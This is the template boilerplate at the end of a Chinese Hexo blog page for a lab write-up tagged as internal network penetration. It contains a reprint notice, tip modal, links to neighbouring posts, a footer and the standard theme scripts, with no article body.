                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2026/03/17/hong-ri-ba-chang-2/">https://wwwmarin.xyz/2026/03/17/hong-ri-ba-chang-2/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">内网渗透</span>
                                </a>
                            
                                <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                                    <span class="chip bg-color">红日靶场系列</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2026/03/17/hong-ri-ba-chang-1/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/76dty8y5jpmit0o32n6a4dpr3.jpg" class="responsive-img" alt="红日靶场 1">
                        
                        <span class="card-title">红日靶场 1</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2026-03-17
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                    渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">内网渗透</span>
                    </a>
                    
                    <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                        <span class="chip bg-color">红日靶场系列</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2025/12/13/mybatis-zhu-ru/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/%E5%A4%8D%E5%81%A5_97310837.jpg" class="responsive-img" alt="Mybatis 注入">
                        
                        <span class="card-title">Mybatis 注入</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2025-12-13
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WEB/" class="post-category">
                                    WEB
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/java/">
                        <span class="chip bg-color">java</span>
                    </a>
                    
                    <a href="/tags/SQL-%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">SQL 注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
